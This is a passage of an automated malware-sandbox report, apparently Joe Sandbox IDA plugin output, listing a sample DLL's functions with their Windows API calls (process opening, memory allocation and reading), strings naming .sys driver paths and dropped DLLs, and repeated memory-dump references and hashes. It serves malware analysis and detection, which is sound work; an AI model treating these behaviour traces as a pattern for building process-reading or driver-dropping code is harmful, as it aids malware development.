                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD7F
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDA7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDC0
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDD7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE00
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE13
                                                                                                                                      • _memset.LIBCMT ref: 69EA38D0
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,00680000,?,00040000,?,?,00000000,0003FFFF,69E842EC,?), ref: 69EA38ED
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 69EA39A6
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$ProcessVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilegeRead_memset
                                                                                                                                      • String ID: M$P$P$U
                                                                                                                                      • API String ID: 3693474235-3046838568
                                                                                                                                      • Opcode ID: 2ea700da3dde14b3079be5e90dd13bea214b1936f2faa6cd2e92033df5441240
                                                                                                                                      • Instruction ID: 0dfb785a26b9b42710a4c498554f5520b869eeafef11c63c3d33f4bdaa5fe600
                                                                                                                                      • Opcode Fuzzy Hash: 2ea700da3dde14b3079be5e90dd13bea214b1936f2faa6cd2e92033df5441240
                                                                                                                                      • Instruction Fuzzy Hash: 53314C6650D3C1DEC312DA695844A9FBFE05FA7218F485A8DF5E857282C660830DC7AB
                                                                                                                                      Function 69E88060 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 85COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$DirectoryWindowswsprintf
                                                                                                                                      • String ID: %s\SysWOW64\%s.sys$%s\system32\%s.sys
                                                                                                                                      • API String ID: 428530437-2838335804
                                                                                                                                      • Opcode ID: 9af6e046e83829c044ced5a0c2573f03f0143ecff12271548b798a1bf89edaf5
                                                                                                                                      • Instruction ID: 3945515ba008e93745bda0503b0645d42753e1a213aad9f463d0629d79b5474a
                                                                                                                                      • Opcode Fuzzy Hash: 9af6e046e83829c044ced5a0c2573f03f0143ecff12271548b798a1bf89edaf5
                                                                                                                                      • Instruction Fuzzy Hash: E621EA76508340AFE320C7A49941FEFB3DDAF86344F54892DA9ADC2151EF34990C87A3
                                                                                                                                      Function 69E81DD0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E81DF7
                                                                                                                                      • _strncpy.LIBCMT ref: 69E81E14
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E81E28
                                                                                                                                      • OutputDebugStringA.KERNEL32(C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\E71620\712EVTPSM.dll), ref: 69E81E42
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E81E49
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                                                                      • String ID: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\E71620\712EVTPSM.dll$C:\pl.txt
                                                                                                                                      • API String ID: 3727115324-4117288167
                                                                                                                                      • Opcode ID: 463a9f66a4a345744db44a7f8440688d3940e12a769c589745bdb84194f885bc
                                                                                                                                      • Instruction ID: 35d51f0fbe08088ab27781c51782c62e2dcd42fd5a2a02ecef4fc6fba199c31b
                                                                                                                                      • Opcode Fuzzy Hash: 463a9f66a4a345744db44a7f8440688d3940e12a769c589745bdb84194f885bc
                                                                                                                                      • Instruction Fuzzy Hash: 5D014E76A046616BD300D6E45D18FEF7B945F95388F748449F8A8AB314DB71D409C3D1
                                                                                                                                      Function 69E81D30 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E81D59
                                                                                                                                      • _strncpy.LIBCMT ref: 69E81D76
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E81D8A
                                                                                                                                      • OutputDebugStringA.KERNEL32(C:\Users\user\Desktop\EEC3DA20E\CFDEE45078\C2B2CFEA7.dll), ref: 69E81DA4
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E81DAB
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                                                                      • String ID: C:\Users\user\Desktop\EEC3DA20E\CFDEE45078\C2B2CFEA7.dll$C:\pl.txt
                                                                                                                                      • API String ID: 3727115324-2849158512
                                                                                                                                      • Opcode ID: 84212a37cd092c9f0723c3b1c851ac4330dafa3268495849b29636c4d4717e34
                                                                                                                                      • Instruction ID: f0a9d9012329e4b8f70718cd4c4916fc7ec2fd6180432ca256446e80aded81a3
                                                                                                                                      • Opcode Fuzzy Hash: 84212a37cd092c9f0723c3b1c851ac4330dafa3268495849b29636c4d4717e34
                                                                                                                                      • Instruction Fuzzy Hash: 420147759042226BD700C6A49E18FAF3B948B81388F349909F8988B381EB71E408C3D2
                                                                                                                                      Function 69E81F80 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E81FA7
                                                                                                                                      • _strncpy.LIBCMT ref: 69E81FC4
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E81FD8
                                                                                                                                      • OutputDebugStringA.KERNEL32(C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A9F7A9DD\A815rppmj.dll), ref: 69E81FF2
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E81FF9
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                                                                      • String ID: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A9F7A9DD\A815rppmj.dll$C:\pl.txt
                                                                                                                                      • API String ID: 3727115324-2366057093
                                                                                                                                      • Opcode ID: 6317b6347eaf43546998b28cfb45b5381fc9e812d2424e89d67c706e06496afa
                                                                                                                                      • Instruction ID: a17f3a222304ed715605a06844f9f82329496268ec81df68f523750459af91cf
                                                                                                                                      • Opcode Fuzzy Hash: 6317b6347eaf43546998b28cfb45b5381fc9e812d2424e89d67c706e06496afa
                                                                                                                                      • Instruction Fuzzy Hash: 2F0147739241216BD300D6A84D04FBE7B856F91388F748549F898AF344DB31E40AD3D1
                                                                                                                                      Function 69E81EF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E81F17
                                                                                                                                      • _strncpy.LIBCMT ref: 69E81F34
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E81F48
                                                                                                                                      • OutputDebugStringA.KERNEL32(C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\F03D5C\9605A212x.dll), ref: 69E81F62
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E81F69
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                                                                      • String ID: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\F03D5C\9605A212x.dll$C:\pl.txt
                                                                                                                                      • API String ID: 3727115324-3975500770
                                                                                                                                      • Opcode ID: d8f78d96904571024b17fcad3215be60803216a3a962957ed705af8ac2eb2424
                                                                                                                                      • Instruction ID: be76d06469e234eb488091a2bd9bf6102959fff384b01a0f69b3a6d5ee0801a1
                                                                                                                                      • Opcode Fuzzy Hash: d8f78d96904571024b17fcad3215be60803216a3a962957ed705af8ac2eb2424
                                                                                                                                      • Instruction Fuzzy Hash: CE019E729042212BD301D6E48D04FBF7B956F81388F748809F8989B354DB70F409C3D1
                                                                                                                                      Function 69E81E60 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E81E87
                                                                                                                                      • _strncpy.LIBCMT ref: 69E81EA4
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E81EB8
                                                                                                                                      • OutputDebugStringA.KERNEL32(C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\B671819D97E4\84AEHJG8C.dll), ref: 69E81ED2
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E81ED9
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                                                                      • String ID: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\B671819D97E4\84AEHJG8C.dll$C:\pl.txt
                                                                                                                                      • API String ID: 3727115324-988791557
                                                                                                                                      • Opcode ID: 43b4adf53e5f0afa43cf8442bc8d6a37529db753de6048fc0cfe54a0f99410c5
                                                                                                                                      • Instruction ID: 773b8d41ea64c1d652fcc2f68061d61cbf2c664ec1fc8264be138604f7e36520
                                                                                                                                      • Opcode Fuzzy Hash: 43b4adf53e5f0afa43cf8442bc8d6a37529db753de6048fc0cfe54a0f99410c5
                                                                                                                                      • Instruction Fuzzy Hash: FD01477290462127D300D7E88D04FAF7B844F85348FB48845B8989B310DA32D409C3D1
                                                                                                                                      Function 69EA4F80 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69EA4C80: _malloc.LIBCMT ref: 69EA4C9E
                                                                                                                                        • Part of subcall function 69EA4C80: _memset.LIBCMT ref: 69EA4CAE
                                                                                                                                        • Part of subcall function 69EA4C80: _memset.LIBCMT ref: 69EA4CC8
                                                                                                                                        • Part of subcall function 69EA4C80: _sprintf.LIBCMT ref: 69EA4CDB
                                                                                                                                        • Part of subcall function 69EA4C80: _memset.LIBCMT ref: 69EA4CEF
                                                                                                                                      • _sprintf.LIBCMT ref: 69EA4FBB
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$_sprintf$_malloc
                                                                                                                                      • String ID: %s%s$.$da1b4f0857d.zip$i$p$z
                                                                                                                                      • API String ID: 1439790989-988375760
                                                                                                                                      • Opcode ID: 6d1b753d90aa81412df3076d6d343892e7d24ec6535b9839d546cf2152f95dcc
                                                                                                                                      • Instruction ID: a82fbc79a0f70a76fd8058e848f075d74bb0c2ff134818bc864ba957932385cb
                                                                                                                                      • Opcode Fuzzy Hash: 6d1b753d90aa81412df3076d6d343892e7d24ec6535b9839d546cf2152f95dcc
                                                                                                                                      • Instruction Fuzzy Hash: A7F0F41880C2C0ADE302D728940176FBFD46FA260CF28D89FE4D80B252E7794449C3A3
                                                                                                                                      Function 69E8B809 Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
